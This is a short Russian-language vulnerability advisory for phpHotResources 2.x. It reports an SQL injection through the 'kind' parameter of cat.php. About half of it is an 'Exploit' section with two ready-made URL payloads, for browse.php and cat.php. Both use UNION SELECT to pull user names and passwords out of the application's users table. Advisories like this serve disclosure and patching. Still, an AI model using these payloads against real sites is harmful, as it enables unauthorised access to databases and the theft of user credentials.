Программа: phpHotResources 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "kind" сценарием cat.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

browse.php?mode=browsebyCat&_gender=0&age_from=15& age_to=-4214/*
*/union/**/select/**/1,user_name,password,4,5,6,7,8/*
*/from/**/users/*&country=&state=&field=body

cat.php?lang=4&kind=-4214+union+select+ 1,user_name,password,4,5,6,7,8,9
+from+users/*



Оставить мнение